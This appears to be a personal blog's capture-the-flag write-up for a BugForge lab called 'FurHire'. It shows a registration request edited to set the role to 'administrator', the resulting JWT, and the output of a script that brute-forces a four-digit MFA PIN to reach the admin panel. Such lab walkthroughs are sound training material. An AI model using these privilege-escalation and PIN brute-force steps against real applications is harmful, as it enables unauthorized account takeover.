top of page

BugForge Write-Up 2/22/2026

  • icanhaspii
  • Feb 28
  • 2 min read

  • BugForge Daily Challenge 2/22/2026 - FurHire



Hint: Your window is small, you might have to try multiple times.



Note:

If there is an admin account active for a lab, the credentials are admin:admin123


  • I launched Burp.


  • I checked to see if there was an admin login using the set/known creds, but there was not.


  • Next, I created a Job Seeker account and was taken to an app that appeared to behave a lot like an online job search platform.  Following along w/ the @B1gB33f write-up, I wanted to take a closer look at the 

"POST /api/register"

traffic, so I highlighted that line, then right-clicked and selected, "Send to Repeater".


  • Next, moving over to the Burp "Repeater" tab, in the "Replay" "Request" pane, I changed the following to turn my plain user account into an admin-level account, and it worked!

{
"role":"user", 
"username":"Tester1", 
"email":"Tester1@AOL.com", 
"full_name":"Tester One", 
"password":"Password" 
}

to:

{
"role":"administrator", 
"username":"attacker", 
"email":"attacker@AOL.com", 
"full_name":"attacker test", 
"password":"Password" 
}

  • I got back the following in the "Response" pane:


{ "token":"eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6NywidXNlcm5hbWUiOiJhdHRhY2tlciIsInJvbGUiOiJhZG1pbmlzdHJhdG9yIiwiaWF0IjoxNzcxODU3Mjg1fQ.Osr2pq_NJ35iNs7oTTUe_f0bmaM-aMDuMVxPCPny65Q", 
"user":{ 
"id":7, 
"username":"attacker", 
"email":"attacker@AOL.com", 
"full_name":"attacker test", 
"role":"administrator" 
}, 
"needsOnboarding":true 
}

  • Next, over in the browser, I logged out of the application and then back in using my new admin creds, and that worked, so I knew I had a working login.


  • Next, I adapted the Python script from the @B1gB33f write-up and let it run its course. I got a token and a PIN, but I couldn't seem to get it to work at "/api/admin/content" or anywhere else in the app.  Note: You might need to run the Python script 2-3 times before it actually grabs a token/PIN combo.

[6286] PIN 6286 -> 200 {'success': True, 'message': 'MFA verification successful'} 
[!!!] VALID PIN: 6286 
[!!!] Token: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6NywidXNlcm5hbWUiOiJhdHRhY2tlciIsInJvbGUiOiJhZG1pbmlzdHJhdG9yIiwiaWF0IjoxNzcxODYxMzY0fQ.fiibPePzCyIf8A-5q9ccBjIocHTzEyRhmOmVehBtvfk 

  • Finally, the following, added tip, from @B1gB33f worked!!! 


>>ok so create administrator account and login - sit at the MFA screen - run script as that user - token hits and we get success message - hit /admin in the browser. I just did it and it worked.<<




##### End of Report ##### 

 

 
 
bottom of page